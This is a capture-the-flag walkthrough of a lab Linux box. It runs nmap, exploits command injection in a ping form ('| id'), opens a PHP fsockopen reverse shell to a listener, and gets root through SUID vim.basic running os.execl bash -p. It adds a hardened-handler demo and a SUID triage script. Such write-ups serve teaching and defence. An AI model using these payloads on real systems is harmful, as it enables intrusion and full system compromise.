Enumeration With Nmap

We always start with an Nmap scan.

nmap -sC -sV -oA nmap <Target-IP>

-sC runs the default NSE scripts, -sV probes for service versions, and -oA writes the results in all three output formats under the prefix "nmap".

└─$ nmap -sC -sV -oA nmap
Starting Nmap 7.91 ( ) at 2021-07-23 14:02 WAT
Nmap scan report for
Host is up (0.27s latency).
Not shown: 998 filtered ports
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 33:b9:6d:35:0b:c5:c4:5a:86:e0:26:10:95:48:77:82 (RSA)
|   256 a8:0f:a7:73:83:02:c1:97:8c:25:ba:fe:a5:11:5f:74 (ECDSA)
|_  256 fc:e9:9f:fe:f9:e0:4d:2d:76:ee:ca:da:af:c3:39:9e (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 36.11 seconds

Web Enumeration On Port 80

Since HTTP is open on port 80, let's visit it in a browser. The page lets us ping a host, so I try pinging localhost to see what the form does. The raw ping output is echoed straight back, which suggests the server is passing our input to a system ping command:


PING ( 56(84) bytes of data.
64 bytes from icmp_seq=1 ttl=64 time=0.035 ms
64 bytes from icmp_seq=2 ttl=64 time=0.050 ms
64 bytes from icmp_seq=3 ttl=64 time=0.039 ms
64 bytes from icmp_seq=4 ttl=64 time=0.046 ms

--- ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3077ms
rtt min/avg/max/mdev = 0.035/0.042/0.050/0.008 ms

Exploitation: OS Command Injection On The Page Form

Let's verify this by attempting to run the id command, appending the following payload to the host field: | id

uid=33(www-data) gid=33(www-data) groups=33(www-data)
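The payload works because the form appends whatever we submit to a shell command line, so "| id" terminates the ping command and pipes into id. The script below is an added example, not the vulnerable application's source (the write-up never shows it): it reproduces the flaw with a stand-in ping_cmd function so it runs offline, and puts a hardened handler next to it that allow-lists the host and never hands the value to a shell.

```shell
#!/bin/sh
# Added example, not the target application's code: the real handler behind
# the ping form is not on the page, so this stand-in builds the command line
# the same naive way ("ping $host" through a shell) and shows the fix.

# Stand-in for /bin/ping so the example runs offline; prints the banner
# the real form echoed back.
ping_cmd() {
    printf 'PING %s 56(84) bytes of data.\n' "$1"
}

# VULNERABLE: the user-supplied host is interpolated into a command string
# that a shell then parses, so |, ;, &&, $( ) and backticks are honoured.
# "127.0.0.1 | id" becomes:  ping_cmd 127.0.0.1 | id
vuln_ping() {
    host="$1"
    eval "ping_cmd $host"
}

# HARDENED: allow-list the value (dotted quad or hostname characters only,
# no leading '-' so it cannot become a ping option) and pass it as a single
# argv element, never through eval or sh -c.
safe_ping() {
    host="$1"
    case "$host" in
        ''|-*|*[!A-Za-z0-9.-]*) printf 'rejected: %s\n' "$host" >&2; return 1 ;;
    esac
    ping_cmd "$host"
}

# Demo: same input, both handlers.
echo '--- vulnerable handler, input "127.0.0.1 | id" ---'
vuln_ping '127.0.0.1 | id'
echo '--- hardened handler, same input ---'
safe_ping '127.0.0.1 | id' || echo '(blocked)'
echo '--- hardened handler, legitimate input ---'
safe_ping 127.0.0.1
```

The allow-list is deliberately stricter than "strip pipes": a blocklist of metacharacters misses cases like $(id) or a leading "-c 100000" that turns the value into a ping option, whereas an allow-list plus separate argv handles both.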

Boom, we have command injection. Now let's get a reverse shell back to us. First, start a listener on the attacking machine:

└─$ sudo nc -nvlp 80
[sudo] password for muzec: 
listening on [any] 80 ...

Now our payload, submitted through the same form. The connect-back port has to match the listener above (80), so the one-liner uses that:

php -r '$sock=fsockopen("",80);exec("/bin/sh -i <&3 >&3 2>&3");'


We have a shell. Now let's upgrade it to a proper TTY:

python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@shakabrah:/var/www/html$ uname -a;id;whoami
uname -a;id;whoami
Linux shakabrah 4.15.0-112-generic #113-Ubuntu SMP Thu Jul 9 23:41:39 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
uid=33(www-data) gid=33(www-data) groups=33(www-data)

SUID Privilege Escalation

find / -perm -u=s -type f 2>/dev/null
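That find lists every file with the setuid bit, which on a stock Ubuntu install is mostly expected (passwd, sudo, mount and friends). As an added example, not part of the write-up, the script below makes the triage repeatable: it runs the same search, flags binaries whose basename is on a short, assumed list of GTFOBins-style shell-escape candidates (vim.basic among them), and flags anything living outside the usual system directories. It ships with a constructed temp-directory fixture so it can be tried without a target; on a real box run flag_suid / instead.

```shell
#!/bin/sh
# Added example, not from the write-up: repeatable SUID triage.
# INTERESTING is an assumed, illustrative list of binaries that give a shell
# when SUID (per GTFOBins); extend it as needed.
INTERESTING="vim vim.basic python python3 perl find bash env nmap less more awk"

# List SUID regular files under a root (default /). -perm -4000 is the
# numeric form of -perm -u=s; 2>/dev/null hides unreadable directories.
list_suid() {
    find "${1:-/}" -perm -4000 -type f 2>/dev/null
}

# Print one line per SUID file: "FLAG <path> (<reason>)" or "ok   <path>".
# Reasons: known-gtfobins (basename on INTERESTING) and unusual-path
# (outside /bin, /sbin, /usr). Paths are printed relative to the root.
flag_suid() {
    root=${1:-/}
    root=${root%/}
    list_suid "${root:-/}" | while IFS= read -r path; do
        rel=${path#"$root"}
        base=${rel##*/}
        reason=""
        for name in $INTERESTING; do
            [ "$base" = "$name" ] && reason="known-gtfobins"
        done
        case "$rel" in
            /bin/*|/sbin/*|/usr/*) ;;
            *) reason="${reason:+$reason,}unusual-path" ;;
        esac
        if [ -n "$reason" ]; then
            printf 'FLAG %s (%s)\n' "$rel" "$reason"
        else
            printf 'ok   %s\n' "$rel"
        fi
    done
}

# Constructed fixture (not real target data): a temp tree with a SUID
# vim.basic, a SUID passwd, a SUID helper in /opt and a non-SUID vim.
make_fixture() {
    dir=$(mktemp -d)
    mkdir -p "$dir/usr/bin" "$dir/opt/backup"
    : > "$dir/usr/bin/vim.basic";   chmod 4755 "$dir/usr/bin/vim.basic"
    : > "$dir/usr/bin/passwd";      chmod 4755 "$dir/usr/bin/passwd"
    : > "$dir/opt/backup/helper";   chmod 4755 "$dir/opt/backup/helper"
    : > "$dir/usr/bin/vim";         chmod 0755 "$dir/usr/bin/vim"
    printf '%s\n' "$dir"
}

# Demo against the fixture; on a live target run: flag_suid /
demo=$(make_fixture)
flag_suid "$demo"
rm -rf "$demo"
```

The two heuristics are complementary: the name list catches well-known escapes such as vim.basic even in /usr/bin, while the path check catches custom SUID helpers an administrator dropped somewhere unusual, which no name list will know about.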

SUID binaries (listed in a screenshot in the original write-up):

/usr/bin/vim.basic stands out in that list. On Ubuntu, vim.basic is built with Python support, so with the SUID bit set it can run arbitrary Python, and therefore a shell, as root. That is our way to root; the -p flag below tells bash to keep the effective UID instead of dropping it:

/usr/bin/vim.basic -c ':py3 import os; os.execl("/bin/bash", "bash", "-pc", "reset; exec bash -p")'


We ran into an error here: vim complains about an unknown terminal type. So let's go back to our attacking machine and check what terminal type it uses:

echo $TERM


It is screen. Back on the target, export TERM with that same value (screen) and run the vim command again.


We are root, and done.

